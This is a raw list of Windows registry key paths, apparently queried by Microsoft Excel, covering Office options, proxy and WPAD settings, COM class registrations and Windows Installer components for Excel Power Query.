HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Settings\Microsoft Excel AWDropdownHidden
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\StatusBar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\OverridePointerMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Ribbon\2
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\RulesSelectionCriteriaTestId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxTelemetryConfirmationEventSent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxShowAttempts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxTelemetryEventSent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ShownFileFmtPrompt
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Control Panel\International\Geo
HKEY_CURRENT_USER\Control Panel\International\Geo\Nation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxAppIDBootedOnce
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\IdToAuthorityUrlMapping
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableADALatopWAMOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ADUserName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\SignedOutADUser
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableWinHttpCertAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableStackOverwriteProtectionExperiment
HKEY_CURRENT_USER\Software\Microsoft\AuthCookies\Live\Default\CAW
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\SignedOutMSAUser
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ConnectedAccountCID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1186\{00000000-0000-0000-0000-000000000000}
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1170\{00000000-0000-0000-0000-000000000000}
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Personalization\Insights
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Personalization\Signals
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\InMS
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security\NoOleLoadFromStreamChecks
HKEY_CURRENT_USER\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_CURRENT_USER\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Sort
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\EnableLogging
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\BlockContentExecutionFromInternet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Gfx
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\FontSmoothingThreshold
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Office Graphics
HKEY_CURRENT_USER\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{529a9e6b-6587-4f23-ab9e-9c7d683e3c50}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529a9e6b-6587-4f23-ab9e-9c7d683e3c50}\InsecureQI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MOTIF\FlexUIAutomation
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\DiagnosticMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TurnOffPhotograph
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DrawInkTab
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0142869F-3C91-4532-B21C-FA3FB67E7E37}_{5082518F-199F-471A-A7DB-EF9850F5E9AB}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Classes\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DeveloperTools
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\CustomUIRoaming
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\RibbonUiExperiment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\UseMockCollabCoordinator
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableDocumentChat
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\HideBuiltInTableStyles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\HideBuiltInStyles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingConfigurableSettings
HKEY_CURRENT_USER\EUDC\1252
HKEY_CURRENT_USER\EUDC
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\CEIPSampledIn
HKEY_CURRENT_USER\Software\Microsoft\Avalon.Graphics
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DisableConnectionReuse
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NOFPU
HKEY_LOCAL_MACHINE\Hardware\Description\System\FloatingPointProcessor
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Randomize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\WK? Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Line Print
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\AppDocs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableAltOOMError
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastWriteTime
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Features\00006109F00000000000000000F01FEC\ExcelPowerQueryFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Features\ExcelPowerQueryFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7DDAC159E5E0B0454838719402146600
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7DDAC159E5E0B0454838719402146600\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BD03B9C9D0C0DB75CB51F6940BB8AC85
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\BD03B9C9D0C0DB75CB51F6940BB8AC85\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5150D8D5D4583CE5B9883DAFF077BB19
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5150D8D5D4583CE5B9883DAFF077BB19\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\949581DB58C70B050A956407E91FF320
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\949581DB58C70B050A956407E91FF320\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2D260493F18242A549E2539558B745E9
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2D260493F18242A549E2539558B745E9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3E01F6698002DC75BAFB865751BB4651
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3E01F6698002DC75BAFB865751BB4651\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5488E92D8586F7852BADD11262110187
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5488E92D8586F7852BADD11262110187\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A7F82185AF9AFA55D97244B053C3E5AB
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A7F82185AF9AFA55D97244B053C3E5AB\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6CAF5874817B1FC568D5DD397C01C911
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6CAF5874817B1FC568D5DD397C01C911\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AD4B7679525A5A957931C1DDBA307A00
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AD4B7679525A5A957931C1DDBA307A00\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\992DB732156E83755A56389DAD7D0ECE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\992DB732156E83755A56389DAD7D0ECE\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5994F54A6A438B25B8B2AE7F9833D587
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5994F54A6A438B25B8B2AE7F9833D587\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E092BB0653712E15C939364BD8C2759D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E092BB0653712E15C939364BD8C2759D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A015EC5390CAF658AF3375E4D09E12D
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A015EC5390CAF658AF3375E4D09E12D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8E2F0C3E855739551A4C648DE279F6D2
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8E2F0C3E855739551A4C648DE279F6D2\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\13C0D2AA0762B6E54B178C647A4E9DCB
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\13C0D2AA0762B6E54B178C647A4E9DCB\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\126AA9BD578C9B151953835E7A3239B1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\126AA9BD578C9B151953835E7A3239B1\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\66B452BDE8AC5F753910CD8885127436
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\66B452BDE8AC5F753910CD8885127436\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\644650B47F4E58753A7CA00EEDAB32C6
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\644650B47F4E58753A7CA00EEDAB32C6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B66837CFAE1CEA35D8D9CFB757D2A1D3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B66837CFAE1CEA35D8D9CFB757D2A1D3\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F94756EC9084B5855B021E590B5C42B8
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\F94756EC9084B5855B021E590B5C42B8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4C21A607174D4435EB1BB87BD3AC4980
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4C21A607174D4435EB1BB87BD3AC4980\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C817DEFD49999F0589CFC0C67B55141B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C817DEFD49999F0589CFC0C67B55141B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EE27E156CC594D156B81D6EAA9129E8B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EE27E156CC594D156B81D6EAA9129E8B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\04416D4D36E5FFB58BC251E181CD659A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\04416D4D36E5FFB58BC251E181CD659A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A6DDB2BF381AFB451BDB434E47B9FD02
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A6DDB2BF381AFB451BDB434E47B9FD02\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A1937C22BE8626F5AB2FBF4C87E9D92A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A1937C22BE8626F5AB2FBF4C87E9D92A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CF305BE65F72B5A53A1C625B79F89117
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CF305BE65F72B5A53A1C625B79F89117\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\478D5F7FBA2947858B5F9D3F0B48099B
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\478D5F7FBA2947858B5F9D3F0B48099B\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6BB8980787E9E0C529C42D07C8A39A02
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6BB8980787E9E0C529C42D07C8A39A02\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3E71086496FDAC354B6A0B1986D1E3A0
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3E71086496FDAC354B6A0B1986D1E3A0\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\35B363CAF61629752BF5212B2F9BB076
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\35B363CAF61629752BF5212B2F9BB076\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\78CA8F34E6B123B5289352D0A80A33F0
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\78CA8F34E6B123B5289352D0A80A33F0\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6562F861960CE9B54986DF761B9F4058
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6562F861960CE9B54986DF761B9F4058\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EB7A08730F63CBA5DBFB539B58417D18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EB7A08730F63CBA5DBFB539B58417D18\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B872013064538C75CAC38A3CCABDB1ED
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B872013064538C75CAC38A3CCABDB1ED\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A92D5E25537ED915987DC0B2D3860938
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A92D5E25537ED915987DC0B2D3860938\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\574993135BF482457B88368631DF2A66
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\574993135BF482457B88368631DF2A66\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8EA0DE4DBB65C01549D39AD330CCE285
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8EA0DE4DBB65C01549D39AD330CCE285\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B8D973C0F713FC450B980245A9A6A5DF
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B8D973C0F713FC450B980245A9A6A5DF\00006109F00000000000000000F01FEC
